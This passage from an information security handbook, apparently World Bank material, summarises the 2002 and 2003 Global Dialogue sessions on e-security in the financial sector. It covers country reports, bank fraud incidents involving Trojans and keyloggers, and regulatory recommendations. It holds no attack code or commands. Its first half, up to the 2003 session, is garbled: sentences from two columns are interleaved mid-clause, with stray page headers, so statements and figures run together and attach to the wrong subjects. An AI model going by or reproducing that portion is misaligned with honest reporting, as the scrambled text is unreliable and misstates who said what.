The first Global Dialogue, "E-Security: Risk Mitigation in the Legal and Regulatory Issues Financial Sector" took place on September 25, 2002. The second Global Dialogue, "Electronic Safety and While five years ago, e-commerce laws were relatively Soundness" took place on September 10, 2003. Videos uncommon, today, there are forty countries with e-com- for both sessions are available in online.102 This chapter merce laws and the number is growing. Of particular contains the highlights of each session including the importance, consumer electronic transaction law, rights comments of representatives from participating countries. and responsibilities, are all vibrant areas of legal devel- opment. Key issues include: Global Dialogue 2002 "E-Security: Risk Mitigation in the Financial Sector" 103 - the validity of electronic signatures and transactions, The session opened with an introduction to e-risk. - individual data protection, note Privacy and the Fair Themes included the shift from closed to open networks Information Practice Guidelines, within the past ten years. On open networks, the - payment systems between banks, particularly dependence on silver bullets, such as SSL which has e-banks, been cracked, has become problematic because they - money laundering and the level of international perpetuate vulnerabilities. For banks, not only are there cooperation required to prevent it, dangers of blended threats, such as Code Red, but also - advances in cyber crime law that address the use of organized hacking crime rings. Many of these crime of computers in criminal acts rings use online casinos as money laundry tools. The International Data Corporation (IDC) estimates that Enforcement requires compliance, cease and desist 57% of hacks have been against the financial industry. orders, and the ability for regulators to remove malicious Furthermore, as the level of sophistication in hacks data from systems. 
While there has been inter-industry increases, the skill level decreases due to the ubiquity cooperation on some levels, the security of e-payments, of downloadable, malicious code that anyone with even for example, has led to a collision of telecom and bank- limited knowledge can launch large-scale attacks. ing. The banking industry defined safety and soundness as the "non-discriminatory access to safe and sound Methods of e-fraud include identity theft and extortion-- financial systems." The telecom industry paradigm, on both highly profitable--especially in attacks the other hand, was "universal access for the public originating in Eastern Europe against the United interest and welfare." These slightly different approach- States. Other methods include salami slicing, funds es to the definition of "safe service" create difficulty transfers, and stock manipulation. Attacks in Asia when organizations are attempting to secure networks specifically targeted the financial sector for obvious and meet commercial needs simultaneously. 102Please note, the full streaming video for the 2002 proceeding can be obtained on The World Bank website, at: http://www.worldbank.org/wbi/B-SPAN/sub_e-security.htm. The video for the 2003 proceeding may be obtained at http://www1.worldbank.org/finance (Click on E-security, within the Conference section.) 103This session was conducted by The World Bank, Integrator Group Members: Thomas Glaessner, Tom Kellermann, and Valerie McNevin, with Global Dialogue Participants from a range of countries including Brazil, Chile, Mexico, Ukraine, Bulgaria, Slovakia, Singapore, South Korea, Philippines, Hong Kong, Sri Lanka, and P.R. China. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 151 Supervision and Prevention encryption will not protect organizations against every threat possible. 
12 core layers of proper secu- In spite of the difficulty with meeting the dual needs of rity are essential for maintaining the integrity of safety and soundness, electronic security is a critical data and mitigating the risks associated with open need of most organizations and there must be a con- architecture environments, and in many instances, certed effort to reduce operational, legal, and reputa- actual implementation of a specific layer need not tional risk in the IT environment. Plans to increase the entail large capital investments or outlays. The 12 security of systems must include: layer checklist is presented in Chapter 11, Part 3. - Education, awareness, and skills training. The World Country Contributions Bank study shows that 50% of the e-security intrusions are by insider threats. This figure is larger when Hong Kong including misuse or failure for safe computing techniques. Representatives from the Hong Kong Monetary Authority opened with an overview of three recent fraud cases: - Auditing and examination processes. There must be 1) A Hacker used Trojan horses to get passwords and cross-border coordination in order to effect change IDs, with which (s)he conducted an unauthorized trans- in the speed at which issues are addressed. For fer of over US$35,000; example, EU banks have servers in Antigua; this 2) A case of E-Payment fraud in Australia occurred as a illustrates the ease with which banks can fail, if result of poor customer awareness of password security; P servers are shut down, and immediate action is this enabled hackers to crack the payment system and, ART hindered by cross-border coordination problems. because institutional limits were not imposed, it is esti- mated that over US $3 million were stolen; - Public-Private Cooperation. Reputational risk leads 3) In a case of online dealing fraud, hackers broke into THREE to a lack of reporting. 
Thus, it is critical to hold a system in order to sell 5 million shares (equivalent to roundtables to discuss both legal issues as well US $21.7 million), and effectively manipulated the as emerging threats. Some examples of functional stock prices. public-private partnerships are the NIPC's InfraGard, a partnership between private industry and the U.S. The lessons learned from these incidents were as follows: government, represented by the FBI. The Forum of 1) Pre-register all third party accounts - this entails Incident Response and Security Teams (FIRST) is controlling all unauthorized accesses and transfers. another form of partnership, bringing a variety of 2) Monitor e-bank transactions and control suspicious computer security incident response teams from accounts and transactions (over SMS, or e-mail accounts government, commercial, and academic organiza- to unregistered third party accounts) tions together. FIRST aims to foster cooperation 3) Use multiple factors for customer authorization, and coordination in incident prevention, prompt such as customer specific information (something that rapid reaction to incidents, and promote information only the individual customer knows or has, like a smart sharing among members and the community at large. card. Passwords may only be valid once. Other collaborations include: The Internet Security 4) Secure awareness of customer (the weakest link) - Alliance (www.isalliance.org) and the Computer due to the ability to use multiple channels or methods Emergency Response Team (CERT). This is a collabo- for transfers, communications should be secure, includ- rative effort between Carnegie Mellon University's ing installing personal firewalls and updating intrusion CERT Coordination Center and a cross-section of detection systems. private international companies. 5) Incidents must be handled and reported quickly, in - Layered Security. 
The most effective approach to IT order to ensure effective responses from the security team. security is a layered approach that is not just covered by technology, but also by people and processes. Over-reliance on silver bullet solutions such as 152 INFORMATION SECURITY AND GOVERNMENT POLICIES In Hong Kong, the government is collaborating with have underscored the importance of security policies banks and police for handling incidents, ensuring and procedures in the e-finance environment: responsiveness, reporting incidents, controlling damages, and ensuring public confidence through 1) In one incident, customers of the biggest bank in effective PR management. Hong Kong also noted that, Singapore had their PC's penetrated by Trojan horses. with regards to ISPs, the variety of existing standards These Trojans illicitly acquired confidential user make it difficult to control, secure, and create information in order to extract large sums of money. awareness of security issues. This particular Trojan was so sophisticated that it escaped the notice of both anti-virus software and Singapore intrusion detection systems, thus highlighting that these tools should not be the only forms of defense Singapore's discussion revolved around four key areas: employed by a commercial entity. the Korean connection, the state of e-finance, the national PKI (Public Key Infrastructure), and recent 2) An earlier incident involved the second largest incident and government actions. Beginning with the bank in Singapore and did not attract as much topic of connectivity, Singapore juxtaposed the follow- international attention. In this case, the bank's ing figures from 1998 and 2001 to illustrate the rapid systems were attacked on unpatched vulnerabilities. technological diffusion: The incident specifics were not shared for reasons of confidentiality. However, this incident illustrates - in 1998 revenues from e-commerce totaled US $40 the need for cooperation among regulatory agencies. 
million; in 2001, the total is US $91 billion; - in 1998 there were about 14,000 households with In Singapore, the government has been actively high speed access; in 2001 was 7.8 million, or 64% involved in endorsing Public Key Infrastructure. The of the total population; Digital Signature Act of 1999 governs the national PKI - in 1998 Internet usage was at 3 million, this figure with the Ministry of Information Communications hold- is up to 24 million in 2001 (half the population in ing responsibility. The National PKI designates licensed Korea); certificate authorities (CA). There is a mutual recognition - Mobile penetration is greater that 50% of the total of the certificate. The Korean Information Security Agency population. (KISA) handles more technical issues, including oversee- ing issues of CA, licensing CA, and conducting research E-Banking has proven to be very popular in Singapore. and development for both wired and wireless PKI. E-Banks are both popular and pervasive in Singapore. Despite a small population of 4 million people, There are currently six, licensed CA's. Due to this approximately 25% of the population engages in online variety, certificates are mutually recognized so that banking. In addition, the industry is experiencing rapid customers can engage in diverse financial services with growth. Online trading began in 1997 and now accounts a single signature. Thus, the user of a digital signature for about 50% of all trades. As a counterpoint, the is protected legally. However, there are challenges, for insurance industry is not growing as quickly, though example, in the banking industry, there is widespread this may be attributed to the nature of the product; use of licensed CA's. However, this is not the case in insurance products tend to be customized and allow brokerage firms; only 4 of 36 securities firms use for little standardization. licensed CA's. 
There are two reasons for this: 1) Online trading started in 1997, 2 years prior to the Looking at the criminal side, the statistics for cyber- enactment of the Digital Signature Act. Thus, users are crime incidents shows that there were approximately comfortable trading online in the absence of a licensed CA. 100 hacking incidents between the years 1996-1997. 2) The use of CA delays the securities transaction and In the year 2000, there were 5,000 reported cases. customers do not want the inconvenience and potential This figure is increasing exponentially. Although loss associated with delayed trades. e-Banking is popular, two recent security incidents Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 153 However, a recent incident in Korea has altered the Credit card fraud has proven to be a challenging area e-security landscape in the context of online trading. for the Philippines (and elsewhere). The country is In August, several brokerage firms found dormant bro- home to 2-3 million credit card holders, approximately kerage accounts. They placed buy-orders for US $20 mil- 17 issuing banks, and supports many millions of busi- lion, buying stocks from institutional investors that ness transactions a year. It is estimated that approxi- were also part of the scheme. As a reaction, security mately 400 million pesos (roughly equivalent to US $8 measures have been augmented. Licensed CA's will million) of lost revenue are attributable to credit card become mandatory at a faster rate than originally con- fraud. ATM cards are also in widespread use, with ceived. On December 1, 2002, private certificates will approximately 10 million cardholders. no longer be allowed. As of September 1, 2002, only licensed certificate authorities (LCA's) can be used. By Third, 9/11 pushed banks to reach out to other countries May 2003, all certificates must be licensed. 
In online in order to seek international cooperation on the topic trading, it will be mandatory for all large brokerage of e-security. firms to use licensed CA's by November 2002, and all small firms by January 2003. As with other locations around the world, in the Philippines e-finance is still in the early stages In the spring of 2003, Singapore will publish of development. Of the 8 recommended pillars in Technology Risk Management Guidelines. Their efforts E-Security: Risk Mitigation, the Philippines has are guided by international efforts and best practices in incorporated the legal framework and enforcement, industry, based on a series of informational meetings public private cooperation, and improving law P between banks, industry participants, and government enforcement capabilities. The Philippines still needs ART officials. One of the key questions for Singapore, which law enforcement experts, including special courts has a single regulator to enforce compliance to stan- comprised of expert panels. Other areas of need include dards, is how a larger nation, like the U.S., deals with information databases and education to all stakeholders, THREE standards enforcement when faced with a much larger including consumers, corporations, and vendors. number of regulatory agencies. The Philippines had two main questions: 1) To what Philippines extent has the United States addressed trade-offs between reporting and protecting reputations? and 2) The Philippines discussion focused on ramifications of What is the state of international enforcement on cyber three possible trends as an indication of the growing crime laws? threat of cyber crime. These are the dissemination of viruses (e.g. "I Love You"), the continuing battle Sri Lanka against credit card company fraud, and, 9/11. 
Though 9/11 occurred in the U.S., the Philippines use this Sri Lanka began by providing a background on the example to demonstrate their government's measures to of e-finance, discussing its limitation on account of protect national financial institutions. penetration of Internet users and awareness among users on e-security. Sri Lanka believes telecom expan- In the Philippines, the spread of the "I Love You" virus sion issues will be resolved in the near term. The prob- prompted immediate regulatory actions. This incident lem with awareness is that it does not exist at the was important because it exposed weaknesses in both Board level. Thus, it is difficult to gather support the public and private sectors. The government respond- for issues such as expansion of connectivity. Among ed by passing e-commerce laws and cyber-strategy laws. customers, there is an additional lack of awareness on Furthermore, it exposed the capacity of law enforcement how secure online transactions can be. As a result, to understand and respond effectively to technology- trust is low among customers and they are reluctant driven incidents. A program on computer security train- to engage in online transactions. Instituting guidelines ing was launched for law enforcement personnel. and frameworks for service providers can help generate confidence in the customer base. 154 INFORMATION SECURITY AND GOVERNMENT POLICIES Sri Lanka's question concerned Internet Service not simple to implement on many applications. The Providers. They asked whether there were policy key facets in Bulgaria's payment systems are vendors, guidelines or frameworks for e-security regulation reliability, and price. There is a demilitarized zone for for ISPs? They also requested information about the bank services, which includes the gateway for all Korean security agency, and whether it was private Internet facing applications, and firewalls. Through or national and what role(s) they support. 
BANKNET, Bulgaria has strict access from the Internet to the network. Most attacks occur on websites and Bulgaria e-mail servers because they face the Internet. Behind the firewall, there is much scrutiny over bank services Bulgaria's bank services were established in 1989, and interbank applications. with a culture similar to that in the United States and Europe. Recent developments include the establishment In Bulgaria and elsewhere, central banks are building of a payment system and software packages specifically legal frameworks on electronic payment systems, which for the commercial banking industry. One such example consists of new regulation on payments and national is BANKNET. Bulgaria approaches e-security by asking payment systems. This establishes a legal basis for the fundamental questions about what must be protected. numerous national payment systems, which include cen- They identify the critical elements as the physical tral depository payment systems and bankcard payment network, internal information systems, applications, systems, among others. Bulgaria finds that the currency and data protection, specifically, data exchanges policy presents a challenge, as the conditions are diffi- between banks and clients. cult for attaining a legal balance. They ask about the role that payment systems oversight must play in com- From an organizational standpoint, Bulgaria has an municating e-security of payment systems. They ask Internal Commission who is responsible for analysis and whether laws should be flexible and soft on coopera- recommendations. The establishment of e-security policies tion, or whether should there be more stringent over- requires monitoring and supervision of networks and sight of the system. Brazil and South Africa have a applications, including up-to-date software and hard- stringent approach on surveillance and oversight on ware, and lists of concrete, specific actions. 
Bulgaria payment systems; they are aiming to design an efficient identifies e-security of payment systems to be extremely and competitive system. In some areas, regulation can critical. Supervision and prevention changes include become a de facto monopoly in provisions of retails education, which is a critical component of their systems and careful consideration of regulations and security planning. They note that they need work third party operators must include an assessment of on legal frameworks and enforcement, including how the technology will affect the retail system. legal and technological conventions between the various network participants. Conclusion In Bulgaria, there is a legal framework on e-signatures, In conclusion, all participating nations identified the which also includes an e-document law, regulation of need for further cross-border educational and training certificate authority activities, and requirements for efforts in the area of e-security. At The World Bank, advanced e-signatures. Currently, the bank would like to the Integrator Unit is recognized for its dedication establish a common PKI. Banks may become the CA to providing best practices reports and seminars within the common PKI for specific applications; though on electronic risk mitigation. there is a need for flexibility in their layers and uniform technologies for interbank systems. Bulgaria also has an issue with security policies - they must define reliabili- ty, as well as business requirements. E-signatures are Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 155 Global Dialogue 2003 "Electronic Safety First, e-security efforts tend to be reactive rather and Soundness" 104 than proactive; this approach should be changed to a continuously proactive effort to combat present and This session stressed the importance of addressing future threats. 
e-security issues in a global context, particularly since the risks in emerging markets are growing at a dramatic Second, cooperation on international issues is rate. Security issues are exacerbated by the irregularity critically important, particularly for supervisors and in press reporting; between hype and conjecture, much law enforcement agencies. However, even in a single of the information regarding electronic safety is inaccu- country, intra-agency cooperation can become a rate. Meanwhile, worms, viruses, and other types of complex endeavor. electronic threats are taking a toll on critical infrastructures around the world. Third, incident reporting is a serious obstacle to understanding the scope of the threats facing us today, The problem of e-security is compounded by a shortage as there is still considerable reluctance to expose of trained information security teams, a lack of sound security breaches. governance procedures, and emerging technologies including mobile communications. The information tech- Fourth, in tandem with reluctance to report security nology (IT) backbone is growing at a rapid rate, and as incidents, response times to breaches lag in many cyber threats and vulnerabilities rise with equal rapidity, e-security efforts. trillions of dollars are put at risk. The purpose of the P Global Dialogue is not to ask why security breaches Finally, personnel issues remain central: it only takes ART occur, but to ask what can be done to curb the problems. one naive user to compromise the integrity of an entire network. Increased awareness of the threats is necessary. E-Security Risk Mitigation: Soft and Hard Ultimately, e-threats will create a loss of public confidence THREE Infrastructure Combined in communication technologies if they are not handled correctly. 
E-security may be defined as "any tool, technique or process that protects a system's information assets from threats to confidentiality, integrity, or availability." E-security is composed of two infrastructures: a soft infrastructure that includes policies, procedures, processes, and protocols, and a hard infrastructure that includes hardware and software. An increased reliance on technology escalates the potential for e-security threats. As we have seen previously, attacks are taking place more frequently and are often launched as blended threats, which are difficult to disarm. The speed and tenacity of the hacking community is growing quickly, due in part to the activities of organized crime and terrorists. The task of deploying effective e-security programs is a significant challenge for several reasons.

Bearing that in mind, several steps should be taken to further progress e-security efforts:

First, regulators, financial institutions, and other market participants should determine and contribute to the dissemination of best practices in IT security.

Second, collaboration should become commonplace, particularly with respect to resolving the key security threats facing organizations and the consumer public.

Third, security personnel and auditor training should be a top priority in commercial and government practice. The definition and containment of operational risk should include the various forms of cyber-risk, in addition to the traditional forms of physical and information risk.

104 This session was conducted by The World Bank, Integrator Group Members: Thomas Glaessner, Tom Kellermann, Valerie McNevin, Yumi Nishiyama and Shane Miller, with commentary from Global Dialogue Participants including Brazil, Chile, Colombia, Mexico, Saudi Arabia, Ukraine, Australia, Beijing China, Hong Kong China, Malaysia, Philippines, Singapore, and Sri Lanka. See http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Presentations for original documentation of these sessions.

Supervision of Information Security and Technology Risk

While the IT sector grows beyond the bounds of local talent capacity, outsourcing has become a major trend. International outsourcing, in particular, has taken off, a situation that creates both problems and opportunities for organizations worldwide. Recent efforts to mitigate e-threats include a proposed guidance requiring banks to develop a response program for protecting against threats to customer information that is maintained by the bank or its service providers. The components of such a program would include procedures for notifying customers about any incidents of unauthorized customer information disclosure that could result in substantial harm or inconvenience to the customer.

In spite of fairly complex policy and procedure initiatives, security continues to take a backseat to ease of use. Therefore, continued education, training, and vigilance are crucial for augmenting contemporary security efforts. Some emerging security areas that warrant additional attention include vulnerability assessment, penetration testing, intrusion detection systems (IDS), and forensics.

Mobile Technologies: New Rewards and New Risks

In 2002, the Global System for Mobile Communications (GSM) had approximately 787 million users worldwide. Wireless is growing at a rate three times faster than that of landlines. GSM is just as susceptible as other transmission technologies to contracting malicious code, such as Trojan horses, e-mail viruses, and denial of service (DoS) attacks. In the hostile environment of the Internet, wireless is the "Achilles heel of security." Often, the wireless connections are the weakest link in the security chain. The GSM vulnerabilities include SIM-card vulnerability, SMS bombs, WAP vulnerabilities, and what is commonly referred to as "man in the middle" attacks.105

Although it is not possible to secure the GSM technologies completely, there are several easy steps through which users are encouraged to strengthen their resistance to attack. Users should: 1) enable a power-on password; 2) install anti-virus software; 3) install a personal firewall along with robust encryption (e.g., S/MIME); 4) ensure that devices are stored securely and that the desktop application mirroring software is password protected; and 5) install virtual private network (VPN) software. In the smart card context, third parties should not handle PIN numbers.

105 In this type of attack, a modified cellular phone acts as a rogue base station for other cellular phones, thereby gaining the ability to steal information over the air. Information is unprotected at the gateway, leaving a massive vulnerability for users and their information.

Country Presentations

In the course of the global dialogue, each of the participating countries was asked to answer the following three questions:

1. What trends do you see with regard to e-security incidents? What are the largest challenges/vulnerabilities (e.g., identity theft, denial of service/systems access, money laundering over the Internet, other forms of electronic fraud, etc.)?

2. At present, what processes are your financial institutions following to mitigate electronic security risks, and what changes in supervision process are you considering?

3. How could the multilateral institutions, in coordination with other supervision agencies and the EBG, best assist you?

Brazil

The representative from Brazil noted that competition drives companies to implement high technology, but these technologies tend to be vulnerable. There is a trade-off between the costs of the services and frauds. With respect to supervision, examination techniques in Brazil are increasing in effectiveness.

In answer to how multilateral institutions can best assist Brazil, they responded that they would like assistance with training examiners, creating security methodologies and standards, and creating security models and minimum bank regulations.

Questions:
Brazil asked how they can create a legal framework to deal with crime, especially considering that the dynamic nature and the rapid pace of technology make legislating problematic.

Responses:
In response, a representative from Singapore suggested instituting tough penalties, as well as updating laws on a regular basis. To take Singapore's example, laws such as the Computer Misuse Act have proven to be beneficial in clarifying what computer crime is and reducing its appeal for casual hackers.

A representative from InfraGard, FBI, stated that this is a social phenomenon across all boundaries. In some cases, perpetrators do not realize the severity of the crimes they are committing, and in fact, some people may not consider computer crimes "crimes" at all. Moreover, banks tend to perpetuate a "myth of safety." More public recognition of the risks in e-finance and e-commerce is necessary, as shielding the data on security incidents only exacerbates the problem. In particular, there is a tremendous problem with the cross-border nature of e-crime, including cyber hacks and bank site alterations. As a result, international collaboration is necessary.

In this context, there is clearly a role for multilateral organizations. For example, UNCITRAL is a model law for computer crime, vandalism, privacy, denial-of-service, and transnational issues. Model laws should be based upon civil law rather than common law.

Question:
Colombia inquired how one raises the integrity of security within financial institutions, especially with cost-benefit considerations. Liability and risk management are fundamental concerns, especially with respect to customers.

Responses:
Collaboration is necessary because of jurisdictional issues, even in identifying the location of the loss associated with a cybercrime incident. To begin with, cross-border standards should be adopted so that a common language can be used to describe the problems and set up a plan for their mitigation. As an example, there has been difficulty with defining "fraud" within the EU. One example of a cross-border organization working in this area is the Financial Action Task Force (FATF), which deals with anti-terrorism and money laundering.

Question:
Mexico inquired about the depth of Singapore's guidelines.

Response:
The general security practices of Singapore can be accessed online.106 The Guidelines include 26 practices that range from the operating system (OS) level to patches, roles and responsibilities, anti-virus software, firewalls, and so on.

106 http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/Singpore_TRMguidelines28Feb03/$FILE/Singpore_TRMguidelines28Feb0

Colombia

The representative from Colombia stated that the security challenges they face are the same as those faced by all countries, yet Colombia feels ill-prepared. At the present time, Colombia has no standard for incident response. There is no Computer Emergency Response Team (CERT). Colombian clients are liable for cyber incidents. Identity theft is rising. Bank cards are being cloned. There is no privacy regulation. Risk mitigation is an auditor problem. PKI and smart cards are used, but e-security for banks seems to be an abstraction. Unfortunately, employees do not generally care about security practices, and security is not ingrained into the banking culture in Colombia. Keeping up to date is a huge problem.

México

In response to the question concerning trends in e-security incidents, Mexico noted that PIN numbers are increasingly accessible via the web, making this a large risk. However, they are making a substantial effort to mitigate e-risk; financial institutions have strong monitoring capabilities, and there are many security and monitoring companies with expertise in IT security. In addition, Mexico has adopted the BASEL recommendations for technology risk management.

On the question of how multilateral institutions can assist Mexico, they recommend a global information exchange among multiple agencies in order to share incidents, assessments, and risk mitigation needs.

Ukraine

Following Ukraine's independence, there was a re-organization of the bank system that included new technology practices, such as electronic transfers. Security technologies such as e-signatures and cryptography are headed by National Banks.107 Since independence, e-signature and e-transfer laws have been adopted. While there have been several attempts at cyber intrusions into banks, there have been no reported financial losses.

On the regulatory front, Ukraine signed the cyber crime convention in 2001, and the country does prosecute for computer misuse. In addition, Parliament has been considering a draft on personal data protection. There are provisions on cyber crime in the criminal code; however, the laws are limited in their effectiveness because they require proof that the offense was intentional. In this regard, the lack of forensics becomes a key issue, as preserving evidence of intentionality is highly problematic. There must be training for security staff and law enforcement personnel on handling evidence.

Question:
Ukraine's primary question concerned responsibility and liability, especially with internal monitoring and reporting efforts. Incident reporting by bank employees, for example, is critical to creating a more secure banking environment. To help incident response capabilities, there is a CERT in Ukraine.

Response:
On the issue of evidence, it is noted that electronic data perishes quickly and there is no standardization for handling forensic evidence in cases of computer crime. Though there is a clear need for digital forensics guidelines, there are no standardized methods accepted by the courts currently.

107 All banks are a part of the National Bank system.

Australia

Australia adopted and implemented BASEL 2 to categorize the loss of information. However, they have found that increased use of intrusion detection systems has been difficult to justify with so many false positives and misconfigured systems. New technologies are built upon old technologies, thereby increasing the complexity and interdependent nature of the system. At the same time, the system may not be well documented. Learning about system interdependencies is critical, but resources remain limited. Australia points out that free educational downloads are available to the public on this particular topic.

Australia makes three key points. First, cyber-crime legislation will exist in all APEC countries by October 2003. This cyber crime legislation includes e-fraud and cross-border electronic law enforcement.

Second, law enforcement education and cooperation are needed across all borders. There will be a compendium of IT development standards. APEC cyber-security will address wireless, and will conduct a study on the risks of technologies such as Wi-Fi.

Third, Computer Emergency Response Teams will exist in all APEC countries by October 2003.

China, Beijing

The representative from China explained that there is an overall need to raise public awareness about the e-security situation, and more external assessments are required. Some of the challenges faced by China in e-security include a lack of risk awareness and risk management ability, especially considering the complex nature of technological practices in e-security. This problem is exacerbated by the lack of cooperation among regulatory and supervisory bodies.

While the security front is uneven, Internet banking is growing rapidly in China; between 1999 and 2003, the number of Internet banks grew from 1 to 27, and the volume of banking transactions increased over a hundred-fold. It was noted that during the recent SARS epidemic, Internet banking surged in popularity. China makes the following suggestions: 1) encourage information sharing on a domestic and international level; 2) establish international e-security standards; and 3) enhance transparency in e-banking.

China, Hong Kong

In Hong Kong, spoofed e-mails are very common, as are viruses and worms. Concurrently, there is a change in the behavior of criminal syndicates. Instead of directly targeting banks, they are now targeting the weakest link, the customer. In this regard, customer education is critical.

A recent incident of a fraudulent bank website illustrates the security problem. One bank website generated particular concern, as the URL was an incomplete Hong Kong address and no digital certificate existed for the website. The fraudulent website claimed the bank had offices in New York and elsewhere, but upon investigation, it was determined that the bank website, as well as the bank itself, were fraudulent. The website was hosted in China. This incident illustrates the critical need for cross-border cooperation, especially as criminal syndicates conduct cross-border crimes. The HKMA is taking initiatives to enhance the supervisory framework, including customer education and disseminating leaflets to inform the public on critical e-security issues and tips for combating crime.

To further enhance e-security supervision, the HKMA maintains close relations with domain registrars. Hong Kong employs an automated process to screen local domain names (.hk). If the word "bank", "banque", or any other form of the word is used in a domain name, it is immediately referred to the HKMA. Additional intra-country cooperation exists with the Hong Kong Police Force, CERT, and the government to set up industry-wide incident responses. The Supervisory Control Self-Assessment (CSA) includes 70-80 banks; since a yearly review is difficult, it is an automated assessment.

Republic of Korea

While the Republic of Korea was unable to participate in the Global Dialogue, they submitted their response to the questions posed by the World Bank. They note that while Korea possesses highly advanced information networks, their security level could be improved. In Korea, 65% of total stock transactions occur online and approximately 25 million people use the Internet. Recent incidents, such as the January 2003 Slammer worm, have had serious effects in Korea and illustrate the fragile nature of the networks.

Korea provided statistics to convey the existing low level of awareness of systems security. According to the Ministry of Information and Communication, only 12.9% of e-commerce companies, 16.7% of academic institutions, and 9.2% of corporations had information security teams. Korea noted that e-security tends to be considered a cost, which may only be addressed given sufficient resources and time. As an example, a relatively small fraction (12.9%) of e-commerce companies, and 6.1% of all companies, have installed intrusion detection systems (IDS).

Sri Lanka

The representative from Sri Lanka explained that threats such as worms and wireless vulnerabilities exist, but Sri Lankan authorities have not heard of any attacks on their banks. There have been no publicized or reported threats to the banking systems. Sri Lanka has had ATMs for 20 years. While e-banking is still in its infancy, its popularity is growing rapidly. The public may purchase stocks online, but again, such capabilities are in their early stages. In Sri Lanka, leapfrogging is proving to be the biggest issue at the present time. For financial institutions, awareness is the key, and examiners must assess risks accurately.

Cyber Security in the Singapore Financial Sector

Tony Chew, Director of Technology Risk Supervision at the Monetary Authority of Singapore (MAS), provided a glimpse of cyber security initiatives in Singapore. He opened by saying that the Monetary Authority exists to "inform, control and pressure institutions." Singapore is trying to be a financial hub, and therefore IT is an extremely important issue.

Two of Singapore's largest banks were attacked by hackers in 2001 and 2002, illustrating the urgent need for electronic risk mitigation practices. In 2001, the largest bank in Singapore, the United Overseas Bank Ltd. (UOB), discovered an intrusion into its Internet banking system. While much of the information concerning the incident remains confidential, it is known that hackers from Eastern Europe attacked the bank's online system. Bank records were probed and penetrated, and the bank's system was manipulated in order to update customer accounts. Not only did it take several months for the bank to detect the problem, but it proved labor-intensive and costly to find out who or what caused the problem.

In 2002, another attack took place on Singapore's second largest bank, DBS Bank. In this incident, network sharing capabilities and inadequately configured systems enabled hackers to target customer systems. The hackers planted Trojan horses and keystroke loggers into 21 DBS customer accounts, allowing them to capture personal identification numbers (PINs) and user identification numbers. While this incident resulted in a relatively low monetary loss of USD 62,000 from customer accounts, it is important to note that the greater loss occurred in the negative publicity resulting from the breach. Newspapers ran stories concerning the attack for an entire month; ultimately, such incidents could lead to a crisis of confidence in online banking.

One critical point of weakness that may have contributed to these incidents is the common use of single-factor authentication. As an example, most ATM machines use very basic authentication measures, though it will only take one or two more large break-ins to make banks reconsider their overly simple authentication processes. There is also an over-reliance on Secure Sockets Layer (SSL) technology; SSL is very limited because it only protects channels during transmission, and not end-to-end. Databases and other storage units must be encrypted at all times to ensure security. Strong cryptography is required end-to-end, and PIN numbers, for example, are processed in a crypto box so that they are never in the clear. However, even then, PINs are not protected enough, because they are short and can easily be captured by hackers.

The MAS created the "Technology Risk Management Guidelines for Financial Institutions." These Guidelines contain 26 recommendations for layered security. Three core themes in the Guidelines include: 1) establishing a robust risk management process; 2) strengthening system availability, security, and recoverability; and 3) deploying strong cryptography to protect data.

In addition to technological policies, the MAS requires banks to conduct on-site evaluations and penetration tests at least once per year. The MAS has a Technology Risk Assessment Team, as well as its own rating system for banks within the Singaporean system. The rating is based upon six criteria established by the MAS. It consists of a scale ranging from 1 to 5, with 1 being the most secure and 5 being the least secure. Banks are required to maintain at least a level 2 grade of satisfactory. They are also expected to have rapid recovery plans for their systems. The ratings information is published to banks as an incentive for improving their security initiatives and promoting a sense of standards. Additionally, banks are required to report any security incidents.

With the increased use of mobile payments, wireless vulnerabilities must be addressed; security practices in wireless banking are currently monitored in Singapore.

Concluding Questions and Comments

The final comments and questions outlined key themes dominating the Global Dialogue.

First, information and awareness play a critical role in educating the public on existing e-security needs. Government mandates such as suspicious activity reports are only useful when they are put into practice.

Second, information disclosure and transparency are important for improving the systems of the future. It was noted that incident cover-up is damaging because customers will go to the press. Instead, companies should rectify the situation immediately; addressing the problem directly with a plan of action is a better response to a security breach. Clearly there is a question of how much to disclose and when to disclose it; some guidelines for handling security incidents are offered in other parts of this Handbook.

Third, most participating countries stressed the need for cross-border cooperation. One area of potentially fruitful collaboration lies in the use of certification programs. In this area, agencies should work with the software community in order to define the security needs of each sector. The EBG is one example of a network of communications and outward dissemination, and InfraGard, a public-private cooperative organization in the Federal Bureau of Investigation (FBI), is another. InfraGard includes all critical infrastructures and approximately 10,000 members. The purpose of this organization is to generate trust and to encourage information sharing among members. It is an example of how bridges must be created in the field of IT security.

Fourth, roles and responsibilities in the matter of e-security liability must be established; fulfillment of fiduciary duty and maintaining a standard of care are very important for e-finance entities. The issues involved are deposits, public trust, and confidence in the financial system.

Finally, outsourcing was a major concern among participants. One example of the problems associated with outsourcing took place in 2001, when a hosting company in the United States was hacked, resulting in a security compromise of over 300 banks. In closing, it is critical for regulators and supervisors to re-evaluate their regulatory umbrella, particularly in the case of third-party money transmitters, such as hosting companies; further details on outsourcing may be found in this Handbook and other references cited in the Bibliography.
PART FOUR
INFORMATION SECURITY AND GOVERNMENT POLICIES

CHAPTER 1. INTRODUCTION
CHAPTER 2. PROTECTING GOVERNMENT SYSTEMS
CHAPTER 3. THE ROLE OF LAW AND GOVERNMENT POLICY VIS A VIS THE PRIVATE SECTOR
CHAPTER 4. GOVERNMENT CYBER-SECURITY POLICIES

CHAPTER 1. INTRODUCTION

As in other areas affecting the Internet, government policy has an important role to play in the promotion of IT security. There is a paradox, however: a sound public policy framework can enhance security, but ill-considered government regulation can do more harm than good. Technology is changing so rapidly and new cyber threats are emerging with such swiftness that government regulation can become a straitjacket, impeding the development and deployment of innovative responses. It is important therefore to achieve the right balance of regulatory and non-regulatory measures. In seeking that balance, policymakers should appreciate some defining characteristics of the Internet. Compared with earlier information and communications technologies, cyberspace is uniquely decentralized. The Internet's power comes in part from the fact that it has no gatekeepers. Most functionality is at the edges rather than at the center of the network. Government cyber-security policies must take into account these features of the Internet. Within this context, there is a range of steps governments can take to improve computer security without interfering with technical design decisions.108

